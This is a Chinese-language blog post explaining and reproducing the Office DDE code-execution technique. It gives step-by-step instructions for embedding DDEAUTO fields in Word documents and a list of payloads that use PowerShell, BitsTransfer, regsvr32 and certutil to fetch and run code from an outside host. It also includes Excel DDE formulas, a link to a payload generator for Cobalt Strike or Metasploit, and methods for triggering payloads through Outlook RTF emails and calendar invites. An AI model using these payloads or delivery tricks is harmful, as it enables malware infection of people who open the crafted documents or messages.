[2021]Office DDE恶意代码执行技术 huoji APT,Office,DDE 2021-05-30 868 次浏览 4 次点赞 随着office宏病毒的被检测率提高, Office DDE恶意代码执行技术在这几年开始流行起来.在这里就简单的介绍并且复现一下DDE的技术实现: 打开一个office文档,插入-文档部件-域,选择第一个= (Formula) 然后右键切换域代码来编辑代码,插入你想执行的payload:  <!--more--> 比如 { DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" } 保存,则再次运行就会弹出计算器 这里有一些网上抄的payload,可以隐藏掉这个路径: ```cpp DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On" DDEAUTO c:\Windows\System32\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\WindowsSystem32cmd.exe /c cscript.exe index.js" DDEAUTO c:\windows\system32\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll " DDEAUTO c:\windows\system32\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe" DDEAUTO c:\Windows\System32\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e " DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe # " "sanr aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" ``` Excel的话,可以隐藏对话框里面的执行文件名字: ```cpp =cmd|'/c calc.exe'!A1 =MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!'' ``` 老外的一个payload生成器,可以结合CS或者metasploit使用: https://github.com/xillwillx/CACTUSTORCH_DDEAUTO ## Outlook 发送包含DDE的Outlook消息也可以自动执行代码。这同样适用于以附件形式发送的电子邮件,但需要注意的是,因为某些电子邮件服务器会将所有电子邮件转换为HTML,为了避免我们的DDE payload失效,我们需要将电子邮件以RTF格式发送。 **当用户打开我们发送的邮件后,DDE payload将会被执行。** ## 约会邀请 1.打开一个新的WORD文档,写入Payload“DDEAUTO c:windowssystem32cmd.exe "/k calc.exe” 2.打开outlook,约会邀请,将WORD中的Payload粘贴在约会邀请正文中,当你复制Payload到正文时,会弹出窗口,选择"N"后,发送约会邀请。  3.每当用户打开日历查看自己的行程安排时,就会触发Payload的执行:  摘抄资料: https://zhuanlan.zhihu.com/p/30564863 https://www.cnblogs.com/17bdw/p/8546380.html 本文由 huoji 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。 点赞 4
还不快抢沙发